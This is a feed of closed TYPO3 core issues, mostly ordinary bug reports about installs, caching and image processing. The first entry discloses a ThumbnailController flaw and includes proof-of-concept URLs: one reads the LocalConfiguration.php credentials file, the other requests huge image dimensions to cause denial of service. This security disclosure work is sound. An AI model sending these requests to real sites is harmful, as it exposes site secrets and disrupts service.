TYPO3 Forge: Issues
http://forge.typo3.org/
2018-08-16T18:33:06Z

TYPO3 Core - Bug #85875 (Closed): Issues in ThumbnailController
http://forge.typo3.org/issues/85875
2018-08-16T18:33:06Z, Oliver Hader (oliver.hader@typo3.org)
<ul>
<li>information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)</li>
<li>denial of service (dimensions, basically whole configuration can be arbitrary)</li>
</ul>
<p>Introduced in <a class="external" href="https://review.typo3.org/#/c/56765/">https://review.typo3.org/#/c/56765/</a> - not yet released in 9.4.0 or 8.7.19</p>
<p>Solution: Add HMAC to all HTTP request parameters.</p>
<a name="PoC"></a>
<h2 >PoC<a href="#PoC" class="wiki-anchor">¶</a></h2>
<p>XSRF Token has to be adjusted in the links below</p>
<a name="Information-Disclosure"></a>
<h3 >Information Disclosure<a href="#Information-Disclosure" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>
<a name="Denial-of-Service"></a>
<h3 >Denial of Service<a href="#Denial-of-Service" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre>

TYPO3 Core - Task #69369 (Closed): EXT:form - Use property value instead of data for TEXTAREA, TE...
http://forge.typo3.org/issues/69369
2015-08-27T17:02:52Z, Oliver Hader (oliver.hader@typo3.org)
<p>The Form Objects (system extension "form") TEXTAREA, TEXTBLOCK, OPTION currently use <code>data</code> as property name to define default values. However, all other objects use <code>value</code>. Since <code>data</code> implies the possibility to use computed values, it shall be deprecated and <code>value</code> used instead.</p>

TYPO3 Core - Bug #54857 (Closed): Test extensions are not considered in functional test cases
http://forge.typo3.org/issues/54857
2014-01-09T00:12:28Z, Oliver Hader (oliver.hader@typo3.org)
<p>The functional testing framework offers the possibility to define custom extensions to be installed for each test scenario.<br />However, this does not work at all, only extensions that are available in the original base installation can be used.</p>
<p>The origin of this misbehaviour can be found in this change set:<br /><a class="external" href="https://review.typo3.org/#/c/19605/32/typo3/sysext/core/Tests/FunctionalTestCaseBootstrapUtility.php">https://review.typo3.org/#/c/19605/32/typo3/sysext/core/Tests/FunctionalTestCaseBootstrapUtility.php</a></p>

TYPO3 Core - Bug #52585 (Closed): Overwriting existing database during install does not work
http://forge.typo3.org/issues/52585
2013-10-07T16:34:30Z, Oliver Hader (oliver.hader@typo3.org)
<p>It sounds nice that existing data cannot be overwritten anymore... however, if it's intended and the database user is not allowed to create new databases, then one is lost after the first 10 seconds with TYPO3.</p>
Steps to reproduce:
<ul>
<li>install TYPO3 CMS 6.2</li>
<li>use user that has a database with data/tables</li>
<li>you won't find the database in the list of "empty databases" - which is correct of course, but not helpful</li>
</ul>

TYPO3 Core - Bug #52578 (Closed): Install process removes permission
http://forge.typo3.org/issues/52578
2013-10-07T13:59:57Z, Oliver Hader (oliver.hader@typo3.org)
<p>The initial server error reads like this:</p>
<p>Forbidden<br />You don't have permission to access /typo3/sysext/install/Start/Install.php on this server.</p>
<p>The permission to the document root folder is modified and thus TYPO3 is currently locking itself out during the install process.<br />Looks like $GLOBALS['TYPO3_CONF_VARS']['BE']['folderCreateMask'] is used as targetPermission...<br />So, either leave out the root node or find a way to determine the correct permission.</p>
<p>In my case I get a<br /><code>Permission denied: /.../introduction/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable, referer: http://.../typo3/sysext/install/Start/Install.php</code></p>

TYPO3 Core - Bug #47969 (Closed): Call to undefined function mime_content_type()
http://forge.typo3.org/issues/47969
2013-05-06T09:21:53Z, Oliver Hader (oliver.hader@typo3.org)
<p>Call to undefined function mime_content_type() on fetching the mime type of the favicon.<br />I'm still investigating the PHP versions and environment. However it looks like a superfluous regression from <a class="issue tracker-4 status-5 priority-4 priority-default closed" title="Task: Make mimetype-detection possible without finfo_file (pre-PHP-5.3, no pecl-fileinfo) (Closed)" href="http://forge.typo3.org/issues/46126">#46126</a></p>

TYPO3 Core - Bug #47145 (Closed): TypoScript stripProfile not forwarded to ProcessedFile
http://forge.typo3.org/issues/47145
2013-04-11T23:47:12Z, Oliver Hader (oliver.hader@typo3.org)
<p>The TypoScript stripProfile feature is not forwarded to<br />ProcessedFile anymore. Example of the feature that has<br />been available in TYPO3 CMS 4.x:</p>
<p><code>10 = IMAGE<br />10.file = fileadmin/images/image1.jpg<br />10.file.stripProfile = 1</code></p>
<p>The protected method modifyImageMagickStripProfileParameters() <br />does not make any sense anymore since the actual ImageMagick<br />processing has been moved around in TYPO3 CMS 6.0.</p>

TYPO3 Core - Bug #46530 (Closed): Crop-Scaled images have wrong file content type
http://forge.typo3.org/issues/46530
2013-03-22T09:57:25Z, Oliver Hader (oliver.hader@typo3.org)
The following scenario is given:
<ul>
<li>resize a 300dpi TIFF image to PNG using stdWrap/cObj</li>
<li>the 'fileExtension' configuration is not set ($fileArray['ext'] is empty)</li>
<li>the processed file csm_... has the file extension PNG</li>
<li>but the file content type is still TIFF, so the file was just renamed, but not converted to PNG</li>
</ul>
<p>Solution:<br />Since the processing task determines the accordant filename and file extension, the image processor (ImageMagick, ...) needs to know about that fact as well.</p>

TYPO3 Core - Bug #46205 (Closed): Cache file could not be written on concurrent actions
http://forge.typo3.org/issues/46205
2013-03-12T15:30:34Z, Oliver Hader (oliver.hader@typo3.org)
<p>I get several errors like</p>
<p><code>The cache file "htdocs/typo3temp/Cache/Data/t3lib_l10n/3e2cbbda0301cf592e5831ef26c56b7b" could not be written.</code></p>
<p>This happens while a scheduler process is running that imports data using t3lib_TCEmain/DataHandler and I'm trying to work in the backend.<br />I consider this kind of a race condition that e.g. in this case language caches are flushed too often if a new record gets persisted in the DataHandler.</p>
<p>I can reproduce this on my local machine (Mac OS X) and a staging server with Ubuntu 12.04.</p>

TYPO3 Core - Bug #34546 (Closed): Records with same UID but different tables are not shown
http://forge.typo3.org/issues/34546
2012-03-05T22:33:55Z, Oliver Hader (oliver.hader@typo3.org)
<p>Records with same UID but different tables are not shown in the Workspace Module.<br />The ExtJS setting "idProperty" needs to point to a unique value.</p>

TYPO3 Core - Feature #31767 (Closed): Integrate accessible content rendering
http://forge.typo3.org/issues/31767
2011-11-12T11:31:49Z, Oliver Hader (oliver.hader@typo3.org)
<p>Integrate accessible content rendering to the frontend.</p>
<p>These changes are a result of the BLE project and are taken from<br />git://git.typo3.org/TYPO3v4/Incubator.git project-accessibility</p>
<pre>
git merge --squash --no-commit ed780a59b42b39dc85b37a46fb1ba03938ac4ca6
git cherry-pick eb77a4890a27075f970e96b0fcef0d4d088d4ad4 --no-commit
git cherry-pick 6238dcf224d5a3deb1744db1d81959e6609bfed6 --no-commit
git cherry-pick 16541a886146a56a8d9797466183c3788c107fbe --no-commit
</pre>

TYPO3 Core - Task #31274 (Closed): Disable file upload in form wizard
http://forge.typo3.org/issues/31274
2011-10-25T12:24:00Z, Oliver Hader (oliver.hader@typo3.org)
<p>Due to a wrong implementation the file upload feature in the form wizard will be disabled for the time being.</p>

TYPO3 Core - Bug #31249 (Closed): Caching tables of new extensions are not created
http://forge.typo3.org/issues/31249
2011-10-25T00:34:19Z, Oliver Hader (oliver.hader@typo3.org)
<p>Creating the caching tables of an extension that has been installed in the same process does not work.<br />Since the cachingConfiguration of the new extension is not forwarded to the cache manager, the new tables are just not known there.</p>

TYPO3 Core - Bug #31246 (Closed): Internal extension information is not updated properly
http://forge.typo3.org/issues/31246
2011-10-24T23:53:12Z, Oliver Hader (oliver.hader@typo3.org)
<p>tx_em_Tools::refreshGlobalExtList() is triggered on installing extensions. However the current implementation is wrong (early return) and does not consider $TYPO3_CONF_VARS.</p>
<p>This misbehavior also prevents the Introduction Package to correctly install accordant cf_* tables of workspaces and extbase, since the information in $TYPO3_CONF_VARS is not available globally.</p>

TYPO3 Core - Bug #31120 (Closed): Add default csc-mailform DIV wrap
http://forge.typo3.org/issues/31120
2011-10-19T18:59:47Z, Oliver Hader (oliver.hader@typo3.org)
<p>A new form element does not have any class settings.<br />This issue reintroduces stdWrap possibilities for the new form system extension.</p>